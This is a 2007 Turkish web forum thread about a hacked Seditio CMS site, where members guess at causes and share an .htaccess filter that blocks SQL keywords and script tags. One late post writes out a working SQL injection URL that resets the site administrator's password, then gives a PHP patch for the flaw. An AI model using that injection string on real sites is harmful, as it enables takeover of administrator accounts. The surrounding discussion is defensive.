| Author | Message |
Hackkobaz
52 posts |
#3753 2007-06-21 19:39 GMT |
|
arkadashlar Seditio'da Yeni bir açık war galiba DvbiL Sitemi Hacklediler. Açıgı Nasıl kapatabiliriz.. Admin paneline girmiş, Ya benim kullaıcı adım ve şifremle veyada yeni bi admin bilmiorum işte ADmin paneline girip siteyi mahvetmiş. bu ne açıgı olabilir acaba arkadahlar sizlerde onleminizi almanız gerkemekte. : Lütfen yardım edin.. |
|
|
Hack Etmek Ne Kadar Zor ise, Hacklenmek 'te O Kadar Kolayd?r.
|
|
Kaan
2,081 posts |
#3758 2007-06-21 21:02 GMT |
|
Sadece gülmek için mesaj yazıyorum
|
|
mert
34 posts |
#3760 2007-06-21 21:42 GMT |
Quote heha aynen guluyom kardes seditio bi sitesi hacklendimi diye seditio da acikmi var |
|
Darkcode
65 posts |
#3763 2007-06-22 12:27 GMT |
|
Sunucuna girip config dosyasini okuyup mysqle dalmış olabilirler.
Veya admin yaptığın birinden şifre almış olabilirler onu hacklemiş olabilirler. Trojan yemiş olabilirsin vs. Yani seditio nun sana yardım etme gibi bir durumu yok. Biraz daha dikkatli olmalısın. Kolay gelsin |
|
|
Gitme.. |
|
mustanq
62 posts |
#3765 2007-06-22 13:48 GMT |
|
Bence daha dikkatli ol ve diğer sitelerde kullandıpın şifreden daha farklı olsun harf+rakam+karakterden oluşsun...!!!
|
|
MADWOLF
74 posts |
#3767 2007-06-22 14:45 GMT |
|
İnsanın sitesinde en büyük açık kendisidir...
Cookie'ni çalmış olabilirler , Admin md5'ini kırıp girmiş olabilir Sql'a bağlanıp yeni admin oluşturmuş olabilir Keylogger,Trojan Yemiş olabilirsin Bunların hepsi varsayım |
|
Dvdbil
2,233 posts |
#3768 2007-06-22 15:01 GMT |
|
Seditio portalda ciddi bir açık olsa, açığı bulan şahıs küçük sitelerle uğraşmaz.
|
|
|
Sitelerinize profesyonel anlamda hizmet verilir;
- Performans optimizasyonu, - Üst düzey güvenlik yamaları, - İsteğe bağlı eklentiler, - Her çeşit bot (program, video, resim, arsiv, haber), - Profesyonel görsel skin. Tüm tasarım, kodlamalar ve optimizasyon Neocrome referansı ile tarafımca hazırlanmakta. *************************İSTATİSTİKLER************************* Müşterim olan danışmanlığını yaptığım toplam kişi sayısı: 23 Sadece Eklenti hazırladığım kişi sayısı: 21 Uygulama yaptığım toplam site sayısı: 38 ------------------------------------------------- Müşterinin isteği doğrultusunda hazırladığım; - eklenti sayısı: 44 - skin sayısı: 8 - bot sayısı: 15 - özel güvenlik yamaları: 21 - Sql performans optimizasyonu: 13 (yüksek hitli siteler için) - Portal genel cache ve materyal optimizasyonu: 15 *************************************************************** |
|
Darkworm
158 posts |
#3771 2007-06-22 15:37 GMT |
|
Cookie çaLmak zor seditioda =] Lamersavar yoksa sql yapmış oLabilirler =] Yada şunuda unutmayalım "Sosyal Mühendislik" bu araların en popüler hack yöntemi =]
|
|
Darkcode
65 posts |
#3773 2007-06-22 15:53 GMT |
|
40 yılın hostçu kandırma işlemi ne ara "Sosyal mühendislik" oldu yahu. |
|
|
Gitme.. |
|
Darkworm
158 posts |
#3774 2007-06-22 16:01 GMT |
Quote |
|
Hackkobaz
52 posts |
#3776 2007-06-22 16:23 GMT |
|
Arkadashlar Trojan Yeme gibi bi durumum yok. Paralı Antivirüs Kullanıyorum, ve PFS, PM gibi Sayfaları Kapattim, Kullanılmıyordu. seditio dizinindeki hiçbiryere Chmod 777 vermedim. SQL 'dan şüpheleniyorum ama seditio'da yeni açık çıktı diye duymuştum o yüzden yeni açık war galiba dedim.
Peki bu SQL'dan nasıl kurtulabilirim. Server baya güvenli hatta en güvenli server diyebiliriz. Fakat SQL'dan kurtulmanın başka bi yolu yokmu acaba çünkü ne kdar güvenlik alırsak alalım tüm siteler SQL ile hacklenebilir herhaLde. Server'a girmekte ayrı bi mesele tabi ama yinede server'a girdikten sonra site hacklencek kesin değil mi? peki nasıl güvenlik alabiliri sQL için. |
|
|
Hack Etmek Ne Kadar Zor ise, Hacklenmek 'te O Kadar Kolayd?r.
|
|
Darkworm
158 posts |
#3780 2007-06-22 18:29 GMT |
|
bu işine yarar sanırım =]
http://www.seditio-tr.com/43-lamersavar-lite-htaccess-kontrollu.html Ayrıca paralı antivirüs kuLLanmak trojan yemiyceğin anlamına gelmez =] Artık trojancılar durumu aştılar çünkü =] kendi trojanını kodlayıp direk atanLar var..Böle bi durumda ztn antivirüsün trojanı anlaması %5 lik bir ihtimal |
|
Xiao
868 posts |
#3782 2007-06-22 18:45 GMT |
|
ben ne dedim.bak hepsi bir bir çıkıyor.birde sözümü dinleseniz tam olacak.inş bir daha hacklenirsiniz.bu yolda gidenlerden hacklenmeyen var mı?çok merak ediyorum |
|
|
Haziran 2008 Seditio Site Yar??mas? >> http://www.seditione.com
|
|
Hackkobaz
52 posts |
#3806 2007-06-22 21:25 GMT |
|
SaoL DarkWorm !
|
|
|
Hack Etmek Ne Kadar Zor ise, Hacklenmek 'te O Kadar Kolayd?r.
|
|
emremix
483 posts |
#3831 2007-06-23 21:02 GMT |
|
arkadaşlar başıma 2 kez geldi seditio da garanti açık var sql injeksiyo İranlı bi hacker tarafından bulumuş.neocrome de var zaten ancak sql injeksiyon yöntemiyle admin şifresi çalınabiliyo bu lamersavar nasıl kurulur bilen var mı ?
|
|
|
Sudo apt-get Alcohol
Forever Ubuntu :) |
|
Darkworm
158 posts |
#3832 2007-06-23 21:09 GMT |
|
TopLu siTe hackLenmeLeri oLsa Kasım-2006 daki Gibi Yeni Açık Var Deriz Ama O Kadar TopLu HackLenmeLer Yok =] Ayrıca Bi Açık BuLunsa Ve Kötü NiyetLi Biri oLsa Neocrome , BhsDesign , T3-Design Gibi Hiti oLan SiteLerden BaşLar HackLemeye , Yada İyi NiyetLi Biriyse Çoktan Neocromeye BiLdirmişTi ve Neocrome Bi Yama YayınLamış oLurdu =]
|
|
Kaan
2,081 posts |
#3834 2007-06-23 21:20 GMT |
|
Bu tür hack olayları Site Adminlerinin Kendi hatalarından kaynaklanıyor. Portalda yaptıgı değişikler nedeniyle acık cıkıyor yada şifresini kaptırıyor. Eklentilerden Kaynaklanıyor bunun gibi bir sürü ihtimal.
|
|
emremix
483 posts |
#3835 2007-06-23 21:35 GMT |
|
yok aga açık çekirdekde sanırım polls yada profil bölümünden ama başka bi bölümde olabilir yokmu şu lamersavarı kullanmayı öğreticek allah rızası için lütfen
|
|
|
Sudo apt-get Alcohol
Forever Ubuntu :) |
|
sHeeT
15 posts |
#3836 2007-06-23 21:37 GMT |
Quote bu kodlar .htacces diye kaydedip ftp'ye at tamam,kendine göre 404.shtml diye dosya oluşturup içine Yasak falan yazabilirsin Code: RewriteEngine on # Rewrite-Code | by dvdbil www.seditio-tr.com RewriteCond %{QUERY_STRING} (\"|%22).*(\>|%3E|<|%3C).* [NC] RewriteRule ^(.*)$ 404.shtml [NC] RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC] RewriteRule ^(.*)$ 404.shtml [NC] RewriteCond %{QUERY_STRING} (\;|\'|\"|\%22).*(union|insert|where|select|update|drop|md5|or|and|if).* [NC] RewriteRule ^(.*)$ 404.shtml [NC] RewriteRule (,|;|<|>|'|`) 404.shtml [NC] açık bulan kişi ne yapsın sitenize,açık olsaydı ldu ve seditio destekli siteler ilk önce hacklanırdı veya hack siteleri,sizin siteyi hacklasa ne olcak, |
|
emremix
483 posts |
#3837 2007-06-23 21:48 GMT |
|
buldum beyler işte o meşhur açık
Code: users.php?m=profile&a=avatarselect&x=011A99&id=def ault.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527//**/where/**/user_id=1/* bunu sitenin sonuna eklerseniz adminin şifresi 123456 oluyo ama her site yemiyor ancak kendi sitemde çalıştı aşağıya ana siteden yaptığım araştırmayı koyuyorum.tabi 123456 md5 haşına göre deişir Neocrome.net bu anasiteden alıntı buda benim yorumum yapmanız gerekenler; profile.inc.php veya users.profile.inc.php dosyalarını açın Code: $avatar = $cfg['av_dir'].urldecode($id); satırını bulun ve bununla değişin Code: $avatar = $cfg['av_dir'].urldecode($id); $avatar = str_replace("'","",$avatar); $avatar = str_replace(",","",$avatar); $avatar = str_replace(chr(0x00),"",$avatar); urldecode() fonksiyonu sonucu oluşan zaafiyeti ortadan kaldırıyor. inşallah doğru aktarabilmişimdir.bu arada teşekürlerinizi eksik etmeyin lütfen |
|
|
Sudo apt-get Alcohol
Forever Ubuntu :) |
Benzer konular (Similar topics) #BETA
| Konular | Mesajlar | Son Yazar | Güncelleme |
| Sitem Hacklendi Sorun Büyük galiba | 8 | Mahkum | 262 Gün |
| sitem hacklendi | 2 | phpcoding | 416 Gün |
| Sitem Hacklendi Lütfen Bakın | 6 | Mahkum | 243 Gün |
| Seditio Da Yeni Açık Önemli | 5 | Dvdbil | 253 Gün |
| Seditio Sistemim Hacklendi | 7 | Darkworm | 454 Gün |

Next page



